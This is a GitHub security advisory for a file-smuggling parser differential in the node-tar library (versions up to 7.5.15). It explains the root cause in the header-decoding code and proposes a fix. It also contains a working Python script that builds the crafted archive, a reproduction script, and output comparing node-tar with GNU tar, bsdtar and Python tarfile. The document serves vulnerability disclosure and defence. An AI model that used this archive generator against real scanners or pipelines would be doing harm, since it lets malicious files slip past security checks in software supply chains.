Skip to content

node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)

Moderate severity GitHub Reviewed Published Jun 1, 2026 in isaacs/node-tar • Updated Jun 15, 2026

Package

npm tar (npm)

Affected versions

<= 7.5.15

Patched versions

7.5.16

Description

Summary

tar (node-tar) applies a PAX extended header's size= record (and other PAX
overrides) to the next header entry of any type, including intermediary
metadata headers such as a GNU long-name (L) or long-link (K) entry. Per
POSIX pax, a PAX extended header (x) describes the next file entry, not the
intermediary extension headers that may sit between the x header and the file
it annotates. Because node-tar lets the PAX size override the byte length of
an intervening L/K/x header, an attacker can desynchronize node-tar's
stream cursor relative to every other mainstream tar implementation
(GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs /
astral-tokio-tar).

The result is a tar parser interpretation differential (CWE-436): a single
crafted archive yields a different set of members under node-tar than under the
reference tar tools. An attacker can use this to hide a member from one parser
while it is visible to another, which defeats security tooling whose scanner and
extractor disagree on archive contents (e.g. a malware/secret scanner that lists
entries with one library while a downstream step extracts with another). node-tar
is one of the most widely deployed JavaScript tar libraries (it backs npm's own
package-tarball handling and is a transitive dependency of a very large fraction
of the npm ecosystem), so the blast radius for "files that extract differently
depending on the tool" is broad.

This is the same root cause and fix that was just addressed upstream in the Rust
tar ecosystem (tar-rs / astral-tokio-tar); node-tar carries the equivalent
defect and has no equivalent guard.

Impact

  • CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as
    the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and
    GHSA-fp55-jw48-c537).
  • A crafted archive can present one logical member list to a tool that lists or
    scans with node-tar and a different member list to GNU tar / libarchive /
    Python tarfile (and vice versa). This lets a malicious file be hidden from a
    scanner that uses a different parser than the eventual extractor, or hidden
    from node-tar-based inspection while still landing on disk via a system tar.
  • No authentication is required; the only precondition is that a victim parses
    an attacker-supplied tar with node-tar. Tar archives are routinely fetched
    from untrusted sources (package registries, user uploads, CI artifacts,
    container layers).
  • Severity: Medium. Impact is integrity-of-archive-interpretation, not direct
    RCE; it is a building block for supply-chain / scanner-evasion attacks rather
    than a standalone code-execution primitive.

Vulnerable code (file:line)

src/header.ts (compiled to dist/esm/header.js:49 and
dist/commonjs/header.js:85 in the published tar@7.5.15):

// Header.decode(buf, off, ex, gex)
this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)

ex is the currently-accumulated PAX local extended header and gex the
PAX global header. The size override from ex/gex is applied
unconditionally to whatever header is being decoded next — there is no check
that the header being decoded is a real file entry rather than an intermediary
extension header.

src/parse.ts, [CONSUMEHEADER] constructs the next header with the current
EX/GEX applied:

const header = new Header(chunk, position, this[EX], this[GEX])

and later branches on whether that header is a metadata entry. this[EX] is
cleared only in the non-meta (real file) branch:

if (entry.meta) {
  // L / K / x / g metadata entries: this[EX] is left intact here
  if (entry.size > this.maxMetaEntrySize) {
    entry.ignore = true
    this[STATE] = 'ignore'
    entry.resume()
  } else if (entry.size > 0) {
    this[META] = ''
    entry.on('data', c => (this[META] += c))
    this[STATE] = 'meta'
  }
} else {
  this[EX] = undefined   // EX cleared only once a real file entry is reached
}

When the stream is ordered x (PAX, size=N) -> L (GNU long-name) -> file, the
L header is constructed with this[EX] still set, so its size/remain
becomes N instead of the L payload's true length. node-tar then consumes N
bytes of "metadata" and resumes header parsing at the wrong offset, landing
mid-stream. Every other mainstream parser applies the PAX size only to the
following file entry, so they stay synchronized.

The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is
to not apply PAX size/overrides when the entry being decoded is itself an
extension header (L GNU long-name, K GNU long-link, x PAX local, g PAX
global).

How input reaches the sink

tar.list(), tar.extract()/tar.x(), and tar.Parse/tar.Unpack all route
every 512-byte header block through Header.decode(...) with the
currently-accumulated EX/GEX. Any consumer that parses an attacker-supplied
archive — tar.list, tar.extract, or piping into the streaming Parser
reaches the sink. No options need to be enabled; the default code path is
affected.

Proof of concept

Archive layout (all standard, GNU-tar-producible blocks):

block 0 : x  header  (PAX local extended, typeflag 'x'), its own size = len(pax body)
block 1 : x  payload : the single PAX record  "...size=2048\n"
block 2 : L  header  (GNU long-name '././@LongLink'), real size = 13
block 3 : L  payload : "longname.txt\0"      (the long name for the next file)
block 4 : file header 'file_a', size = 16
block 5 : file_a body (16 bytes, zero-padded to 512)
block 6 : file header 'file_b', size = 16
block 7 : file_b body (16 bytes, zero-padded to 512)

Generator (make_tar.py, pure stdlib, no external deps):

def hdr(name, size, typeflag):
    h = bytearray(512); name = name[:100]; h[0:len(name)] = name
    h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0'
    h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0'
    h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00'
    h[148:156] = b' ' * 8
    cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode()
    return bytes(h)

def pad(d):
    return d + b'\0' * ((512 - len(d) % 512) % 512)

def pax_record(key, val):              # length-prefixed PAX record "LEN key=val\n"
    body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body)
    while True:
        s = str(n).encode() + body
        if len(s) == n: break
        n = len(s)
    return s

pax = pax_record('size', 2048)         # malicious: claim size=2048 for the "next" entry
out  = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)
out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0')
out += hdr(b'file_a', 16, b'0')        + pad(b'AAAA_file_a_body')
out += hdr(b'file_b', 16, b'0')        + pad(b'BBBB_file_b_body')
out += b'\0' * 1024
open('pax-desync.tar', 'wb').write(out)

A negative-control archive is identical except the PAX record is
pax_record('comment', 'x') (no size=), written to pax-control.tar.

End-to-end reproduction (against pinned version tar@7.5.15, latest release)

Install the published package into a clean project and parse both archives:

$ npm init -y >/dev/null && npm install tar@7.5.15
$ node -e "console.log(require('tar/package.json').version)"
7.5.15
$ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js
49:        this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);

e2e.mjs:

import * as tar from 'tar'
async function listEntries(f){
  const got=[], warns=[]
  await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },
                   onwarn:(code,_msg)=>warns.push(code) })
  return { got, warns }
}
const mal = await listEntries('pax-desync.tar')
console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))
const ctl = await listEntries('pax-control.tar')
console.log('CONTROL  entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))

Verbatim output:

=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===

[MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B)
  tar.list() entries : []
  tar.list() warnings: ["TAR_ENTRY_INVALID"]

[NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override)
  tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}]
  tar.list() warnings: []

Reference parsers on the same pax-desync.tar:

$ tar tvf pax-desync.tar
-rw-r--r--  0 0      0        2048 Jan  1  1970 longname.txt          # GNU tar

$ bsdtar tvf pax-desync.tar
-rw-r--r--  0 0      0        2048 Jan  1  1970 longname.txt          # libarchive

$ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])"
['longname.txt']                                                      # Python tarfile

Interpretation differential: GNU tar, libarchive (bsdtar), and Python tarfile
all extract the member longname.txt from pax-desync.tar, whereas node-tar
7.5.15 desynchronizes, raises TAR_ENTRY_INVALID (checksum failure from
landing mid-stream), and reports zero members. The negative control proves
the divergence is caused solely by the PAX size= override being applied to the
intermediary L header — when the same archive carries a PAX record without
size=, node-tar parses it identically to the reference tools
(longname.txt, file_b).

Suggested fix

When decoding a header, do not apply PAX size (or other PAX overrides) if the
header being decoded is itself an extension header. Concretely, in
src/parse.ts clear/ignore this[EX] (and this[GEX] for size) when the
header's type is ExtendedHeader, GlobalExtendedHeader, NextFileHasLongPath
(GNU L), or NextFileHasLongLinkpath (GNU K); equivalently, in
Header.decode, gate the ex?.size ?? gex?.size override on the decoded type
not being one of those extension types. This mirrors the upstream Rust fix,
which guards pax_size with
is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions.

A fix PR is being prepared against a private fork and will be linked here.

Fix PR

To be linked from a private fork of the repository (the fix will not be pushed
to any public fork or to upstream during embargo).

Credits

Reported by tonghuaroot.

References

@isaacs isaacs published to isaacs/node-tar Jun 1, 2026
Published to the GitHub Advisory Database Jun 15, 2026
Reviewed Jun 15, 2026
Last updated Jun 15, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v4 base metrics

Exploitability Metrics
Attack Vector Local
Attack Complexity Low
Attack Requirements None
Privileges Required None
User interaction None
Vulnerable System Impact Metrics
Confidentiality None
Integrity High
Availability None
Subsequent System Impact Metrics
Confidentiality None
Integrity None
Availability None

CVSS v4 base metrics

Exploitability Metrics
Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.
Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.
Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.
Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.
User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.
Vulnerable System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
Subsequent System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

EPSS score

Weaknesses

Interpretation Conflict

Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state. Learn more on MITRE.

CVE ID

CVE-2026-53655

GHSA ID

GHSA-vmf3-w455-68vh

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.